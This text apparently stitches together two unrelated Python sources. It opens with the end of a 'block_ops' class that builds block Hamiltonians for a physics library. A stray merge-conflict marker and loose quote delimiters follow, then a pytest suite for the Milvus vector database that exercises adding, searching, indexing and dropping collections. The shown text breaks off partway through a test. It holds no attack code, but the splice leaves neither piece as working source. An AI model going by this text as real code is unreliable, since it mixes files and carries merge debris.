* compute_all_blocks: (optional) flag which tells the class to just compute all hamiltonian blocks at initialization.
This option also sets save_previous_data to True by default.
* check_symm: (optional) flag which tells the function to check the symmetry of the operators for the first hamiltonian constructed.
* check_herm: (optional) same for check_symm but for hermiticity.
* check_pcon: (optional) same for check_symm but for particle conservation.
--- block_ops attributes ---: '_. ' below stands for 'object. '
_.dtype: the numpy data type the block hamiltonians are stored with
_.save_previous_data: flag which tells the user if data is being saved.
_.H_dict: dictionary which contains the block hamiltonians under key str(block) where block is the block dictionary.
_.P_dict: dictionary which contains the block projectors under the same keys as H_dict.
_.basis_dict: dictionary which contains the basis objects under the same keys as H_dict.
_.static: list of the static operators used to construct block hamiltonians
_.dynamic: list of dynamic operators used to construct block hamiltonians
"""
self._basis_dict = {}
self._H_dict = {}
self._P_dict = {}
self._V_dict = {}
self._E_dict = {}
self._dtype=dtype
self._save = save_previous_data
self._static = static
self._dynamic = dynamic
self._checks = {"check_symm":check_symm,"check_herm":check_herm,"check_pcon":check_pcon}
self._no_checks = {"check_symm":False,"check_herm":False,"check_pcon":False}
self._checked = False
self._get_proj_kwargs = get_proj_kwargs
blocks = list(blocks)
for block in blocks:
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self._save=True
self.compute_all_blocks()
@property
def dtype(self):
return self._dtype
@property
def save_previous_data(self):
return self._save
@property
def H_dict(self):
return self._H_dict
@property
def P_dict(self):
return self._P_dict
@property
def basis_dict(self):
return self._basis_dict
@property
def static(self):
return list(self._static)
@property
def dynamic(self):
return list(self._dynamic)
def update_blocks(self,blocks,basis_con,basis_args,compute_all_blocks=False):
blocks = list(blocks)
for block in blocks:
if str(block) not in self._basis_dict.keys():
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self.compute_all_blocks()
def compute_all_blocks(self):
for key,b in _iteritems(self._basis_dict):
if self._P_dict.get(key) is None:
p = b.get_proj(self.dtype,**self._get_proj_kwargs)
self._P_dict[key] = p
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._no_checks)
self._H_dict[key] = H
def diag_ensemble(istate,**diag_ensemble_kwargs):
pass
=======
'''
|
test_add_vectors.py
|
import time
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_add"
ADD_TIMEOUT = 60
tag = "1970-01-01"
add_interval_time = 1.5
nb = 6000
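# Baseline call pattern exercised by the cases below (sketch only; `connect` and
# `collection` are pytest fixtures supplied by the test harness, helpers come from utils):
#
#     vectors = gen_vectors(5, dim)
#     status, ids = connect.add_vectors(collection, vectors)           # server-generated ids
#     connect.flush([collection])                                      # make vectors searchable
#     status, result = connect.search_vectors(collection, 1, vectors)  # top_k = 1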
class TestAddBase:
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, collection):
'''
target: test add vector, then check collection existence
method: add vector and check collection existence with has_collection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert assert_has_collection(connect, collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, collection, get_simple_index):
'''
target: test build index after add vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, collection, get_simple_index):
'''
target: test build index after add vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2 for a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count both equal the number of vectors added
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
connect.flush([collection])
assert status.OK()
assert len(ids) == nq
status, result = connect.search_vectors(collection, top_k, query_records=vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for _ in range(nq)]
with pytest.raises(Exception):
connect.add_vectors(collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count both equal the number of vectors added
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the partition_tag param
expected: the collection row count equals nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition and add vectors in it
expected: the collection row count equals nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition, add vectors with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
new_tag = "new_tag"
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=new_tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it repeatedly, with the partition_tag param
expected: the collection row count equals nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
for i in range(5):
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
# @pytest.mark.level(2)
# def test_add_vectors_without_connect(self, dis_connect, collection):
# '''
# target: test add vectors without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nq = 5
# vectors = gen_vectors(nq, dim)
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.add_vectors(collection, vectors)
def test_add_collection_not_existed(self, connect):
'''
target: test add vectors in collection, which not existed before
method: add vectors collection not existed, check the status
expected: status not ok
'''
nq = 5
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(gen_unique_str("not_exist_collection"), vector)
assert not status.OK()
assert not ids
def test_add_vector_dim_not_matched(self, connect, collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
# TODO: enable
# @pytest.mark.repeat(10)
@pytest.mark.timeout(ADD_TIMEOUT)
def _test_add_vector_with_multiprocessing(self, args):
'''
target: test add vectors, with multi processes
method: multiple processes add vectors concurrently
expected: status ok and result length is equal to the length of added vectors
'''
collection = gen_unique_str()
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
milvus.create_collection(param)
vector = gen_single_vector(dim)
process_num = 4
loop_num = 5
processes = []
def add():
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
i = 0
while i < loop_num:
status, ids = milvus.add_vectors(collection, vector)
i = i + 1
# milvus.disconnect()
for i in range(process_num):
p = Process(target=add, args=())
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
time.sleep(2)
status, count = milvus.count_collection(collection)
assert count == process_num * loop_num
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_add_rows_count_multi_threading(self, args):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and add vectors in it(idmap),
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
collection = gen_unique_str()
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
milvus.create_collection(param)
vectors = gen_vectors(nb, dim)
def add(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
status, result = milvus.add_vectors(collection, records=vectors)
assert status.OK()
status = milvus.flush([collection])
assert status.OK()
for i in range(thread_num):
x = threading.Thread(target=add, args=(i, ))
threads.append(x)
x.start()
for th in threads:
th.join()
status, res = milvus.count_collection(collection)
assert res == thread_num * nb
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of L2
method: create 20 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
for j in range(5):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddIP:
"""
******************************************************************
The following cases are used to test `add_vectors / index / search / delete` mixed function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, ip_collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
param = {'collection_name': ip_collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, ip_collection):
'''
target: test add vector, then check collection existence
method: add vector and check collection existence with has_collection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert assert_has_collection(connect, ip_collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, ip_collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': 'test_add_vector_delete_another_collection',
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, ip_collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index after add vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index after add vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
if index_type == IndexType.IVF_PQ:
pytest.skip("Skip some PQ cases")
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, ip_collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
connect.flush([ip_collection])
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2 for a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
